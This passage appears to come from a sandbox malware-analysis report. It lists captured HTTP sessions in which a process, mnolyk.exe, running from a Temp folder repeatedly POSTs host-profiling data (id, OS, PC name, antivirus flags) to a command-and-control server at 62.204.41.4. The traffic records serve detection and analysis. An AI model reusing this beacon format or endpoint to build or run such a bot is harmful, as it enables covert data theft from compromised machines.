                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:37.239892006 CET | 820 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      361 | 192.168.2.7 | 50089 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:37.423383951 CET | 821 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:37.487719059 CET | 821 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      362 | 192.168.2.7 | 50090 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:37.652978897 CET | 822 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:37.717353106 CET | 822 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      363 | 192.168.2.7 | 50091 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:37.888526917 CET | 823 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:37.953670025 CET | 823 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      364 | 192.168.2.7 | 50092 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:38.122805119 CET | 824 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:38.188714027 CET | 824 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      365 | 192.168.2.7 | 50093 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:38.357594013 CET | 825 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:38.421977997 CET | 825 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      366 | 192.168.2.7 | 50094 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:38.590483904 CET | 826 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:38.656254053 CET | 826 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      367 | 192.168.2.7 | 50095 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:38.824933052 CET | 827 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:38.888752937 CET | 827 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      368 | 192.168.2.7 | 50096 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:39.062078953 CET | 828 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:39.127321959 CET | 828 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      369 | 192.168.2.7 | 50097 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:39.294548035 CET | 829 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:39.360487938 CET | 829 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      37 | 192.168.2.7 | 49761 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:06.571219921 CET | 469 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:06.636575937 CET | 469 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      370 | 192.168.2.7 | 50098 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:39.529541016 CET | 830 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:39.593358040 CET | 830 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      371 | 192.168.2.7 | 50099 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:39.765161037 CET | 831 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:39.828778028 CET | 831 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      372 | 192.168.2.7 | 50100 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:39.998888969 CET | 832 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:40.063755035 CET | 832 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      373 | 192.168.2.7 | 50101 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:40.235234022 CET | 833 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:40.300606012 CET | 833 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      374 | 192.168.2.7 | 50102 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:40.471333027 CET | 834 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:40.537971020 CET | 834 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      375 | 192.168.2.7 | 50103 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:40.718413115 CET | 835 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:40.784142017 CET | 835 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      376 | 192.168.2.7 | 50104 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:40.952666998 CET | 836 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:41.018651009 CET | 836 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      377 | 192.168.2.7 | 50105 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:41.185986996 CET | 837 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:41.251419067 CET | 837 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
